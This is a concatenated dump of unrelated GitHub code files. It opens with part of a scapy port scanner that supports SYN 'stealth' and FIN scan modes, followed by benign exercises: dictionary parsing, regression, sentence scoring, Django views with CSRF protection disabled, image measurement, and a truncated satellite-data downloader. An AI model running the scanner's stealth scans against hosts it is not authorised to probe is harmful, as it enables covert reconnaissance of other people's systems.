[TARGET IPv4 ADDR] [SCAN MODE]\")\n print(\"Scan mode options: CONNECT, STEALTH, FIN (case-insensitive)\")\n sys.exit()\n\n# Check if host is resolvable:\ntry:\n socket.gethostbyname(TARGET_HOST)\nexcept socket.gaierror:\n print(\"Cannot resolve hostname provided.\")\n\ndef connect_scan(host, dst_port):\n tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"S\"), verbose=0, timeout=1 )\n if(tcp_scan_resp != None):\n pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n if(pktflags == \"SA\"): # SYNACK\n rst = sr( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"AR\"), verbose=0, timeout=1 )\n return \"OPEN\"\n\n if(pktflags == \"RA\"): # RSTACK\n return \"CLOSED\"\n else:\n return \"CLOSED\"\n\ndef stealth_scan(host, dst_port):\n tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"S\"), verbose=0, timeout=1 )\n if(tcp_scan_resp != None): \n pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n if(pktflags == \"SA\"): # SYNACK\n rst = sr( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"R\"), verbose=0, timeout=1 )\n return \"OPEN\"\n\n if(pktflags == \"RA\"): # RSTACK\n return \"CLOSED\"\n else:\n return \"CLOSED\"\n\ndef fin_scan(host, dst_port):\n tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"F\"), verbose=0, timeout=1 )\n if(tcp_scan_resp != None):\n pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n if(pktflags == \"RA\"): # RSTACK\n return \"CLOSED\"\n else:\n return \"OPEN\"\n\nSTART_TIME = datetime.now()\nprint(\"\\n* Start port scan at \" + str(START_TIME) )\nprint(\"* Notable open ports on \" + TARGET_HOST + \"...\")\nprint(\"-\"*55)\nprint(\"| {:^15} | {:^15} | {:^15} |\".format(\"PORT\", \"STATE\",\"SERVICE\"))\nprint(\"-\"*55)\n\nclosed = 0 \nfor x in range(1, 65535):\n #print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), fin_scan(TARGET_HOST, x), socket.getservbyport(x)))\n try:\n if(SCAN_MODE.upper() == \"CONNECT\"): \n if(connect_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), connect_scan(TARGET_HOST, x), socket.getservbyport(x)))\n else: closed+=1\n\n elif(SCAN_MODE.upper() == \"STEALTH\"): \n if(stealth_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), stealth_scan(TARGET_HOST, x), socket.getservbyport(x)))\n else: closed+=1\n \n elif(SCAN_MODE.upper() == \"FIN\"): \n if(fin_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), fin_scan(TARGET_HOST, x), socket.getservbyport(x)))\n else: closed+=1\n\n else:\n print(\"| {:^51} |\".format(\"INCORRECT CONNECTION METHOD.\"))\n print(\"-\"*55)\n sys.exit()\n except OSError:\n pass\n\nprint(\"-\"*55)\nprint(\"* Elapsed time: \" + str(datetime.now() - START_TIME))\nprint(\"* Not shown: \" + str(closed) + \" closed ports. The rest do not have a service associated.\")","repo_name":"maxineauma/port_scanner","sub_path":"port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27726035700","text":"agenda_dicc = {\r\n '01234567L':\r\n {'dni': '01234567L', 'nombre': 'Luis González', 'email': 'luisgonzalez@mail.com', 'teléfono': '656343576',\r\n 'descuento': 12.5},\r\n '71476342J':\r\n {'dni': '71476342J', 'nombre': 'Macarena Ramírez', 'email': 'macarena@mail.com', 'teléfono': '692839321',\r\n 'descuento': 8.0},\r\n '63823376M':\r\n {'dni': '63823376M', 'nombre': 'Juan José Martínez', 'email': 'juanjo@mail.com', 'teléfono': '664888233',\r\n 'descuento': 5.2},\r\n '98376547F':\r\n {'dni': '98376547F', 'nombre': 'Carmen Sánchez', 'email': 'carmen@mail.com', 'teléfono': '667677855',\r\n 'descuento': 15.7}\r\n}\r\n\r\nagenda_lista = [\r\n {'dni': '01234567L', 'nombre': 'Luis González', 'email': 'luisgonzalez@mail.com', 'teléfono': '656343576',\r\n 'descuento': 12.5},\r\n {'dni': '71476342J', 'nombre': 'Macarena Ramírez', 'email': 'macarena@mail.com', 'teléfono': '692839321',\r\n 'descuento': 8.0},\r\n {'dni': '63823376M', 'nombre': 'Juan José Martínez', 'email': 'juanjo@mail.com', 'teléfono': '664888233',\r\n 'descuento': 5.2},\r\n {'dni': '98376547F', 'nombre': 'Carmen Sánchez', 'email': 'carmen@mail.com', 'teléfono': '667677855',\r\n 'descuento': 15.7}\r\n]\r\n\r\n# print(agenda_lista, agenda_dicc)\r\n\r\ntexto = \"\"\"dni;nombre;email;teléfono;descuento\r\n01234567L;Luis González;luisgonzalez@mail.com;656343576;12.5\r\n71476342J;Macarena Ramírez;macarena@mail.com;692839321;8\r\n63823376M;Juan José Martínez;juanjo@mail.com;664888233;5.2\r\n98376547F;Carmen Sánchez;carmen@mail.com;667677855;15.7\"\"\"\r\n\r\n# Printer lista de manera bonita:\r\n#\r\n# for persona in agenda_lista:\r\n# for (clave,valor) in persona.items():\r\n# print(f\"{clave} -> {valor}\", end=\" \\n\")\r\n# print(\"=============================\")\r\n#\r\n\r\n# ============= Otra forma =======================\r\n#\r\n# for persona in agenda_lista:\r\n# for atributo in persona.items():\r\n# print(f\"{atributo[0]} -> {atributo[1]}\", end=\" \\n\")\r\n# print(\"=============================\")\r\n#\r\n\r\n# Printer de la agenda de manera bonita:\r\n#\r\n# for agenda in agenda_dicc.values():\r\n# for atributo in agenda.items():\r\n# print(f\"{atributo[0]} -> {atributo[1]}\", end=\" \\n\")\r\n# print(\"=============================\")\r\n#\r\n\r\n# Para conseguir un valor del diccionario:\r\n#\r\n# dni = input(\"Dime el dni de la persona a buscar: \")\r\n# print(agenda_dicc.get(dni, \"Ese dni no esta en la base de datos\"))\r\n\r\n# Para hacerlo en la lista es mas complejo\r\n#\r\n# dni = input(\"Dime el dni de la persona a buscar: \")\r\n# buscado = None\r\n#\r\n# for persona in agenda_lista:\r\n# if (persona['dni'] == dni):\r\n# # Se puede printear directamente.\r\n# # print(persona)\r\n# # Tambien hacer una copia e imprimir al final del bucle\r\n# buscado = {**persona}\r\n# break # Se puede usar para parar el bucle !\r\n#\r\n# if buscado is None:\r\n# print(\"Ese DNI no esta en la base de datos.\")\r\n# else:\r\n# print(buscado)\r\n\r\n# 27.1\r\n#\r\n#\r\n# todo = []\r\n# diccionario = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for i in range(1,len(lineas)):\r\n# datos = lineas[i].split(\";\")\r\n# conjunto = dict(zip(cabecera, datos))\r\n# conjunto['descuento'] = float(conjunto['descuento'])\r\n# todo.append(conjunto)\r\n#\r\n# print(todo)\r\n\r\n# 27.1 Atencion a como recorre la lista en este ejemplo: !!\r\n\r\n# todo = []\r\n# diccionario = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for linea in lineas[1:]:\r\n# datos = lineas.split(\";\")\r\n# conjunto = dict(zip(cabecera, datos))\r\n# todo.append(conjunto)\r\n\r\n# print(todo)\r\n\r\n# 27.2\r\n\r\n\r\n# diccionario = dict()\r\n# diccinario2 = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for i in range(1,len(lineas)):\r\n# datos = lineas[i].split(\";\")\r\n# diccinario2 = dict(zip(cabecera, datos))\r\n# diccionario[datos[0]]=diccinario2\r\n#\r\n# print(diccionario)\r\n\r\n# 27.2 Dani\r\n\r\nagenda_dicc = dict()\r\nlineas = texto.split(\"\\n\")\r\ncabecera = lineas[0].split(\";\")\r\n\r\nfor linea in lineas[1:]: # <--- Atento a esto !\r\n datos = linea.split(\";\")\r\n persona = dict(zip(cabecera, datos))\r\n persona[\"descuento\"] = float(persona[\"descuento\"])\r\n agenda_dicc[persona[\"dni\"]] = persona\r\n\r\nprint(agenda_dicc)\r\n","repo_name":"Ismaelbase/sistemas-de-gestion-empresarial","sub_path":"Tema 3 - Inicio Python/Ejercicios/Ejercicio 27/estructuras_complejas.py","file_name":"estructuras_complejas.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"38349058243","text":"\"\"\"\nDescription:\nGiven an array/list [] of n integers , Arrange them in a way similar to the to-and-fro movement of a Pendulum\n\n - The Smallest element of the list of integers , must come in center\n position of array/list.\n - The Higher than smallest , goes to the right .\n\n - The Next higher number goes to the left of minimum number and So on,\n in a to-and-fro manner similar to that of a Pendulum.\n\n\"\"\"\n\n\ndef pendulum(values):\n values.sort()\n res = [0 for _ in range(len(values))]\n begin = len(values) // 2\n if len(values) % 2:\n begin = len(values) // 2\n res[begin] = values[0]\n for i in range(1, len(values)):\n if i % 2:\n res[begin + (i + 1) // 2] = values[i]\n else:\n res[begin - (i + 1) // 2] = values[i]\n else:\n begin = (len(values) - 1) // 2\n for i in range(len(values)):\n if i % 2:\n res[begin + (i + 1) // 2] = values[i]\n else:\n res[begin - (i + 1) // 2] = values[i]\n return res\n\nif __name__ == \"__main__\":\n print(pendulum([4,6,7,5]))","repo_name":"MaximSinyaev/CodeWars","sub_path":"c7kyu/the-poet-and-the-pendulum.py","file_name":"the-poet-and-the-pendulum.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33078847788","text":"import numpy as np\n\n\ndef soft_threshold(x, threshold):\n if x > threshold:\n return 1.\n elif x < - threshold:\n return -1.\n else:\n return 0.\n\n\nclass Lasso(object):\n\n def __init__(self, regularization=1., rho=1.):\n self.regularization = regularization\n self.rho = rho\n\n self.fitted = False\n self.weights = None\n\n def train(self, X, y, n_iterations=10):\n assert len(X.shape) == 2\n assert len(y.shape) <= 2\n\n n_samples = X.shape[0]\n n_features = X.shape[1] + 1\n ones = np.ones((n_samples, 1))\n X_tilde = np.append(ones, X, axis=1)\n\n a = np.random.normal(size=(n_features, 1))\n b = np.random.normal(size=(n_features, 1))\n\n inv = (np.dot(X_tilde.T, X_tilde) +\n self.rho * np.identity(n_features))\n\n inv = np.linalg.inv(inv)\n\n for _ in range(n_iterations):\n\n x = np.dot(inv, (np.dot(X_tilde.T, y.reshape(n_samples, -1)) +\n self.rho * a - b))\n\n a = (x + b / self.rho)\n a = np.apply_along_axis(\n lambda v: soft_threshold(v, self.regularization / self.rho),\n 1, a\n ).reshape(b.shape)\n\n b += self.rho * (x - a)\n\n weights = np.dot(inv, (np.dot(X_tilde.T, y.reshape(n_samples, -1)) +\n self.rho * a - b))\n\n self.weights = weights\n self.fitted = True\n\n def predict(self, X):\n assert self.fitted\n\n n_samples = X.shape[0]\n ones = np.ones((n_samples, 1))\n X_tilde = np.append(ones, X, axis=1)\n\n prevision = np.dot(X_tilde, self.weights)\n\n return prevision.reshape(-1)\n","repo_name":"HichamEB/ml_algorithms","sub_path":"linear_models/lasso_regression/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31651601119","text":"from sentence_transformers import SentenceTransformer, util\nfrom pymongo import MongoClient\nimport time\nimport torch\ntorch.cuda.set_device(0)\n\nmodel_sentence_transformers = SentenceTransformer('./model/labse_bert_model')\n\nMONGO_CONNECTION_STRING = \"mongodb://localhost:27017/\"\nmongo_client = MongoClient(MONGO_CONNECTION_STRING)\n\ndb_data_pool = mongo_client['mlops']\n\n\ndef score_sentences(sentences_src, sentences_tgt):\n\n embeddings_src = model_sentence_transformers.encode(\n sentences_src, show_progress_bar=False, convert_to_numpy=True, normalize_embeddings=True)\n\n embeddings_tgt = model_sentence_transformers.encode(\n sentences_tgt, show_progress_bar=False, convert_to_numpy=True, normalize_embeddings=True)\n\n cosine_scores = util.dot_score(embeddings_src, embeddings_tgt)\n\n return cosine_scores\n\n\ndef clean_with_score(collection):\n\n sentences_src = []\n sentences_tgt = []\n ids = []\n\n results = db_data_pool[collection].find({'LaBSE': {'$exists': False}})\n\n for i, result in enumerate(results):\n sentences_src.append(result['sentence_src'])\n sentences_tgt.append(result['sentence_tgt'])\n ids.append(result['_id'])\n\n if (i+1) % 50000 == 0:\n cosine_scores = score_sentences(sentences_src, sentences_tgt)\n assert len(ids) == len(sentences_src) == len(\n sentences_tgt) == len(cosine_scores)\n for k in range(len(ids)):\n db_data_pool[collection].update_one({'_id': ids[k]},\n {'$set': {'LaBSE': round(float(cosine_scores[k][k]), 4)}})\n sentences_src.clear()\n sentences_tgt.clear()\n ids.clear()\n print(k, flush=True)\n print(i, flush=True)\n\n cosine_scores = score_sentences(sentences_src, sentences_tgt)\n assert len(ids) == len(sentences_src) == len(\n sentences_tgt) == len(cosine_scores)\n for k in range(len(ids)):\n db_data_pool[collection].update_one({'_id': ids[k]},\n {'$set': {'LaBSE': round(float(cosine_scores[k][k]), 4)}})\n sentences_src.clear()\n sentences_tgt.clear()\n ids.clear()\n print(k, flush=True)\n print(i, flush=True)\n\n\ndef main(collection=\"en||ms\"):\n\n start_time = time.time()\n\n clean_with_score(collection)\n print(\"finished {}\".format(collection), flush=True)\n\n \n print(\"--- {} seconds ---\".format(time.time() - start_time), flush=True)\n\n\nif __name__ == '__main__':\n import plac\n plac.call(main)\n","repo_name":"zouxunlong/cleaning","sub_path":"labse_scoring.py","file_name":"labse_scoring.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27996980494","text":"import json\n\n\nfrom django.core import serializers\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django import forms\nfrom .forms import NameForm,DescriptionForm, CustomNameForm, CustomDescriptionForm\n\nfrom .Utils import BodyData, ModelToJson\nfrom .models import Courses as CoursesModel\n\n\ndef FetchCourses():\n return list(CoursesModel.objects.values())\n\n\nclass Courses(TemplateView, forms.Form):\n\n def get(self, request, *args, **kwargs):\n courses = FetchCourses()\n if len(courses):\n return JsonResponse({'courses': courses}, status=200)\n else:\n return HttpResponse('Zero courses', status=204)\n\n @csrf_exempt\n def post(self, request, *args, **kwargs):\n\n content = BodyData(request)\n\n if content is None:\n return HttpResponse('You can\\'t create course without name and description', status=204)\n\n\n name = content['name']\n description = content['description']\n c = CoursesModel(name=name, description=description)\n c.save()\n\n return JsonResponse(ModelToJson(c), status=201)\n \n\nclass Course(TemplateView):\n\n def get(self, request, *args, **kwargs):\n\n fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id']).values()\n\n if not fetchedCourse:\n return HttpResponse('Course is Not found', status=404)\n else:\n return JsonResponse(data=fetchedCourse[0], status=200)\n\n @csrf_exempt\n def put(self, request, *args, **kwargs):\n\n\n fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id'])[0]\n content = BodyData(request)\n\n if not fetchedCourse:\n return HttpResponse('Course is Not found', status=404)\n elif content is None:\n return HttpResponse('You can\\'t Update course without name and description', status=204)\n else:\n name = content['name']\n description = content['description']\n\n fetchedCourse.name = name\n fetchedCourse.description = description\n fetchedCourse.save()\n return JsonResponse(ModelToJson(fetchedCourse),status=201)\n\n @csrf_exempt\n def delete(self, request, *args, **kwargs):\n fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id'])[0]\n\n if not fetchedCourse:\n return HttpResponse('Course is Not found', status=404)\n else:\n fetchedCourse.delete()\n return HttpResponse('Course {} deleted'.format(kwargs['course_id']), status=200)\n","repo_name":"ssary/bld_Django_1","sub_path":"server/server/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27357965611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 5 14:09:39 2021\r\n\r\n@author: 20183245\r\n\"\"\"\r\n# import the necessary packages\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\nfrom sympy import *\r\nfrom sympy.geometry import *\r\n\r\nimage = cv2.imread('images/test.tiff')\r\nlbound=475 #x coord of the section\r\nrbound=550 #x coord of the section\r\nimageright=image[:,lbound:]\r\noutputright = imageright.copy()\r\noutput= image.copy()\r\nimageleft=image[:,:rbound]\r\noutputleft = imageleft.copy()\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n#Canny edges\r\nedges1 = cv2.Canny(gray,6000,6000,apertureSize = 7)\r\nedgesright=edges1[:,lbound:]\r\nedges2 = cv2.Canny(gray,9000,9000,apertureSize = 7)\r\nedgesleft=edges2[:,:rbound]\r\n\r\n# Find right circle\r\ncirclesright = cv2.HoughCircles(edgesright, cv2.HOUGH_GRADIENT,1,8, param1=100,param2=49,minRadius=20,maxRadius=75) #cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT,1,8, param1=63,param2=26,minRadius=20,maxRadius=75)\r\n# ensure at least some circles were found\r\nif circlesright is not None:\r\n\t# convert the (x, y) coordinates and radius of the circles to integers\r\n\tcirclesright = np.round(circlesright[0, :]).astype(\"int\")\r\n\t# loop over the (x, y) coordinates and radius of the circles\r\n\tfor (xr, yr, rr) in circlesright:\r\n\t\t# draw the circle in the output image, then draw a rectangle\r\n\t\t# corresponding to the center of the circle\r\n\t\tcv2.circle(outputright, (xr, yr), rr, (0, 255, 0), 1)\r\n\t\tcv2.rectangle(outputright, (xr - 2, yr - 2), (xr + 2, yr + 2), (0, 128, 255), -1)\r\ncright=Circle(Point(xr+lbound,yr),rr) #right side of the particle\r\n\r\n#Find left circle\r\ncirclesleft = cv2.HoughCircles(edgesleft, cv2.HOUGH_GRADIENT,1,8, param1=600,param2=36,minRadius=20,maxRadius=75) #cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT,1,8, param1=63,param2=26,minRadius=20,maxRadius=75)\r\n# ensure at least some circles were found\r\nif circlesleft is not None:\r\n\t# convert the (x, y) coordinates and radius of the circles to integers\r\n\tcirclesleft = np.round(circlesleft[0, :]).astype(\"int\")\r\n\t# loop over the (x, y) coordinates and radius of the circles\r\n\tfor (xl, yl, rl) in circlesleft:\r\n\t\t# draw the circle in the output image, then draw a rectangle\r\n\t\t# corresponding to the center of the circle\r\n\t\tcv2.circle(outputleft, (xl, yl), rl, (0, 255, 0), 1)\r\n\t\tcv2.rectangle(outputleft, (xl - 2, yl - 2), (xl + 2, yl + 2), (0, 128, 255), -1)\r\n \r\n \r\ncleft=Circle(Point(xl,yl),rl) #left side of the particle\r\n\r\n# Find the walls\r\nedges3 = cv2.Canny(gray,60,60,apertureSize = 3) #ap=3 works best\r\nlines = cv2.HoughLinesP(edges3,1,np.pi/180,292,minLineLength=350,maxLineGap=300) \r\ncv2.line(outputleft, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1) #check which lines are the correct ones\r\ncv2.line(outputleft, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\ncv2.line(outputright, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1)\r\ncv2.line(outputright, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\n#cv2.line(output, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1)\r\n#cv2.line(output, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\n\r\n# Defining the correct lines as capillary walls\r\ntopwall=Line(Point(lines[2,0,0],lines[2,0,1]),Point(lines[2,0,2],lines[2,0,3]))\r\nbottomwall=Line(Point(lines[3,0,0],lines[3,0,1]),Point(lines[3,0,2],lines[3,0,3]))\r\n# Calculating all intersection points\r\n[S1a,S1b]=intersection(topwall,cleft) #first one is correct\r\n[S2a,S2b]=intersection(topwall,cright) #second one is correct \r\n[S3a,S3b]=intersection(bottomwall,cleft) #first one is correct\r\n[S4a,S4b]=intersection(bottomwall,cright) #second one is correct\r\n#Lbands\r\nLbandtop=float(sqrt((S1a[0]-S2b[0])**2+(S1a[1]-S2b[1])**2))\r\nLbandbottom=float(sqrt((S3a[0]-S4b[0])**2+(S3a[1]-S4b[1])**2))\r\nLband=int((Lbandtop+Lbandbottom)/2) #average of top and bottom contact length\r\ncv2.line(output, (int(S1a[0]),int(S1a[1])), (int(S2b[0]),int(S2b[1])),(0,255,0),1) #draw top lband\r\ncv2.line(output, (int(S3a[0]),int(S3a[1])), (int(S4b[0]),int(S4b[1])),(0,255,0),1) #draw bottom lband\r\n#cv2.line(output, (int((S1a[0]+S2b[0])*0.5),int((S1a[1]+S2b[1])*0.5)), (int((S3a[0]+S4b[0])*0.5),int((S3a[1]+S4b[1])*0.5)),(0,255,0),1) #line trhough middle of the lbands\r\n## Calculating points for spherical cap\r\nXmidright=int(0.5*S2b[0]+0.5*S4b[0]) #Xcoord of the right point on the middle horizontal line through the particle\r\nYmidright=int(0.5*S2b[1]+0.5*S4b[1])\r\nXmidleft=int(0.5*S1a[0]+0.5*S3a[0]) #Xcoord of the left point on the middle horizontal line though the particle\r\nYmidleft=int(0.5*S1a[1]+0.5*S3a[1])\r\n# Create points from the x/y coords calculated above\r\np_midright=[Xmidright,Ymidright] #Midpoint between wall intersections with right circle\r\np_midleft=[Xmidleft,Ymidleft] #Midpoint between wall intersections with left circle\r\nslope=(Ymidright-Ymidleft)/(Xmidright-Xmidleft) #slope of the midline, used to extend the midline line in the next part\r\n# =============================================================================\r\n# #Extended midline\r\ncv2.line(output,(int(Xmidleft)-100,int(Ymidleft-100*slope)),(int(Xmidright)+100,int(Ymidright+100*slope)),(0,255,0),1) #draw extended midline in output\r\n# cv2.circle(output, (xl, yl), rl, (0, 255, 0), 1) #draw left circle in output image\r\n# cv2.circle(output, (xr+lbound, yr), rr, (255, 0, 0), 1) #draw right circle in output image\r\n# =============================================================================\r\ncv2.line(output,(int(S1a[0]),int(S1a[1])),(int(S3a[0]),int(S3a[1])),(0,255,0),1) #draw the rbands\r\ncv2.line(output,(int(S2b[0]),int(S2b[1])),(int(S4b[0]),int(S4b[1])),(0,255,0),1) #draw the rbands\r\nmidline=Line(Point(Xmidleft-100,Ymidleft),Point(Xmidright+100,Ymidright)) #define the midline for sympy\r\n# rband\r\nrright1=float(midline.distance(S2b)) # top part of right rband\r\nrright2=float(midline.distance(S4b)) # bottom part of right rband\r\nrleft1=float(midline.distance(S1a)) # top part of left rband\r\nrleft2=float(midline.distance(S3a)) # bottom part of left rband\r\nRband=int(((rright1+rright2)/2+((rleft1+rleft2)/2))/2) #average of all 4 rbands\r\n# Point for calculating volume\r\n[Smidleft1,Smidright1]=intersection(cleft,midline) #intersections between midline and left side of particle\r\np_h1=[int(Smidleft1[0]),int(Smidleft1[1])] # most left intersection point\r\nh1=float(sqrt((Xmidleft-p_h1[0])**2+(Ymidleft-p_h1[1])**2)) #h1 parameter for spherical cap\r\n[Smidleft2,Smidright2]=intersection(cright,midline) #intersections between midline and right side of particle\r\np_h2=[int(Smidright2[0]),int(Smidright2[1])] # most right intersection point\r\nh2=float(sqrt((Xmidright-p_h2[0])**2+(Ymidright-p_h2[1])**2)) #h2 parameter for spherical cap\r\n# Volume sperical cap\r\nV_sc1=(np.pi*h1**2)/3*(3*rl-h1)\r\nV_sc2=(np.pi*h2**2)/3*(3*rr-h2)\r\n## Calculating volume of fustrum\r\nh3=Xmidright-Xmidleft\r\nr1=(rright1+rright2)/2\r\nr2=(rleft1+rleft2)/2\r\nV_cf=np.pi*h3/3*(r1**2+r1*r2+r2**2)\r\n#final volume\r\nV_Particle=int(V_sc1+V_cf+V_sc2)\r\n\r\n## add text to image\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\nbottomLeftCornerOfText = (10,400)\r\nfontScale = 1\r\nfontColor = (255,255,255)\r\nlineType = 2\r\n\r\ncv2.putText(output,'Lband='+\"{}\".format(Lband),\r\n bottomLeftCornerOfText,\r\n font, \r\n fontScale,\r\n fontColor,\r\n lineType)\r\nbottomLeftCornerOfText = (10,430)\r\ncv2.putText(output,'Rband='+\"{}\".format(Rband),\r\n bottomLeftCornerOfText,\r\n font, \r\n fontScale,\r\n fontColor,\r\n lineType)\r\nbottomLeftCornerOfText = (10,460)\r\ncv2.putText(output,'Volume='+\"{}\".format(V_Particle),\r\n bottomLeftCornerOfText,\r\n font, \r\n fontScale,\r\n fontColor,\r\n lineType)\r\n# Checking figures\r\ncv2.imshow(\"output\", np.hstack([imageright, outputright])) # show right circle\r\ncv2.imshow(\"output\", np.hstack([imageleft, outputleft])) # show left circle\r\ncv2.imshow(\"output\", output) # show wall lines\r\n#cv2.imwrite('images/im_text.png', output ) # save image in images folder\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"IvoHoffmanns/BEP_Ivo","sub_path":"calcLbRbVolume.py","file_name":"calcLbRbVolume.py","file_ext":"py","file_size_in_byte":8161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"71250792154","text":"while True:\r\n L = list(map(int,input().split(\" \")))\r\n x = max(L)\r\n if x==0:\r\n break\r\n L.remove(x)\r\n if x**2 == L[0]**2 + L[1]**2:\r\n print(\"right\")\r\n else:\r\n print(\"wrong\")","repo_name":"IkbeomJo/Baekjoon","sub_path":"백준/Bronze/4153. 직각삼각형/직각삼각형.py","file_name":"직각삼각형.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73867126874","text":"# %% [markdown]\n# This Notebook downloads data from PC in the format required by the inference notebook.\n#\n\n# %%\nimport requests\nimport planetary_computer\nimport pystac_client\nimport geopandas as gpd\nfrom pathlib import Path\nimport numpy as np\nimport requests\nimport json\nfrom datetime import datetime\nimport shapely\nimport pandas as pd\nimport rasterio as rio\nfrom tqdm.auto import tqdm\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n# %%\ndef add_cloud_pct(items_df):\n items_df[\"cloud_pct\"] = items_df.apply(\n lambda row: row[0].properties[\"eo:cloud_cover\"], axis=1\n )\n return items_df\n\n\n# %%\n# add_cloud_pct(items_df)\n\n\n# %%\n# use the world tide api to get the tide height at the time of the image\ndef add_tide_height(centroid, items_df, world_tides_api_key):\n results = []\n lon, lat = centroid.coords[0]\n for id, item in items_df.iterrows():\n dt_str = item[0].to_dict()[\"properties\"][\"datetime\"]\n\n dt_obj = datetime.fromisoformat(dt_str.replace(\"Z\", \"+00:00\"))\n\n # Fetch data from API\n url = f\"https://www.worldtides.info/api/v3?heights&date={dt_obj.date().isoformat()}&lat={lat}&lon={lon}&key={world_tides_api_key}\"\n response = requests.get(url)\n data = json.loads(response.text)\n\n min_diff = float(\"inf\")\n closest_entry = {}\n target_timestamp = dt_obj.timestamp()\n for entry in data[\"heights\"]:\n diff = abs(entry[\"dt\"] - target_timestamp)\n if diff < min_diff:\n min_diff = diff\n closest_entry = entry\n\n results.append(closest_entry[\"height\"])\n\n items_df[\"tide_height\"] = results\n\n return items_df\n\n\ndef get_band(href, attempt=0):\n try:\n singed_href = planetary_computer.sign(href)\n with rio.open(singed_href) as src:\n return src.read(1), src.profile.copy()\n except:\n print(f\"Failed to open {href}\")\n if attempt < 3:\n print(f\"Trying again {attempt+1}\")\n return get_band(href, attempt + 1)\n else:\n print(f\"Failed to open {href} after 3 attempts\")\n return None, None\n\n\ndef downlaod_bands(items_with_tide, time_steps, required_bands):\n bands = []\n profile = {}\n pbar = tqdm(total=time_steps * len(required_bands), leave=False)\n for id, row in items_with_tide.iterrows():\n scene_bands = []\n\n for band in required_bands:\n href = row[\"item\"].assets[band].href\n band, profile = get_band(href)\n if type(band) == type(None):\n print(f\"Failed to download {href}\")\n scene_bands = []\n break\n pbar.update(1)\n\n scene_bands.append(band)\n for band in scene_bands:\n bands.append(band)\n if len(bands) == time_steps * len(required_bands):\n return bands, profile\n return bands, profile\n\n\ndef split_by_orbits(items):\n orbits = {}\n for item in items:\n orbit = item.properties[\"sat:relative_orbit\"]\n if orbit not in orbits:\n orbits[orbit] = [item]\n else:\n orbits[orbit].append(item)\n return orbits\n\n\ndef export_tif(bands, profile, export_path):\n array = np.array(bands)\n profile.update(count=array.shape[0])\n with rio.open(export_path, \"w\", **profile) as dst:\n dst.write(array)\n\n\ndef download_scene(\n row,\n target_bands,\n time_steps,\n extract_start_year,\n extract_end_year,\n export_dir,\n required_bands,\n world_tides_api_key,\n):\n _, row = row\n centroid = row.geometry.centroid\n export_path = export_dir / f\"{row.Name}_{extract_start_year}_{extract_end_year}.tif\"\n print(export_path)\n\n if export_path.exists():\n print(f\"File exists for {row.Name}\")\n return\n\n # Sentinel-2 query parameters\n query = {\n \"collections\": [\"sentinel-2-l2a\"],\n \"intersects\": shapely.to_geojson(centroid), # type: ignore\n \"datetime\": f\"{extract_start_year}-01-01T00:00:00Z/{extract_end_year}-12-31T23:59:59Z\",\n \"query\": {\"s2:mgrs_tile\": {\"eq\": row.Name}},\n }\n 